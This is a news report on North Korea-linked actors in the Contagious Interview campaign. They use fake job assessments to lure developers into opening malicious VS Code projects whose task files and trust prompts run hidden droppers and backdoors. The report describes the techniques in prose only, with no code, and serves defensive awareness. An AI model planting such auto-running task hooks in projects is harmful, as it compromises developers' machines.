North Korean threat actors linked to the long-running Contagious Interview campaign are using malicious Microsoft Visual Studio Code (VS Code) projects to deliver backdoors capable of remote code execution, according to new findings from Jamf Threat Labs.
The campaign, initially disclosed by researchers from OpenSourceMalware, targets software developers by posing as job recruiters and instructing victims to clone repositories hosted on GitHub, GitLab, or Bitbucket as part of fake technical assessments. Once opened in VS Code, the projects abuse task configuration files to automatically execute malicious payloads (often hosted on Vercel) whenever a folder is opened, ultimately deploying malware such as BeaverTail and InvisibleFerret.
Recent variants of attack introduced more sophisticated multi-stage droppers hidden in task files and disguised as benign spell-check dictionaries. The files execute obfuscated JavaScript as soon as the project is opened, establishing communication with attacker-controlled servers and fetching additional payloads. Jamf researchers have identified a previously undocumented infection method that delivers a backdoor via VS Code’s trust mechanism, particularly impacting macOS systems.
On macOS, granting trust to the repository triggers background shell commands that silently download and execute JavaScript through Node.js, ensuring persistence even if VS Code is closed. The backdoor enables system fingerprinting, continuous beaconing, and remote command execution, with later-stage scripts designed to clean up traces of activity. Some of the code appears to have been generated using AI tools.
“This activity highlights the continued evolution of DPRK-linked threat actors, who consistently adapt their tooling and delivery mechanisms to integrate with legitimate developer workflows. The abuse of Visual Studio Code task configuration files and Node.js execution demonstrates how these techniques continue to evolve alongside commonly used development tools,” the report concludes.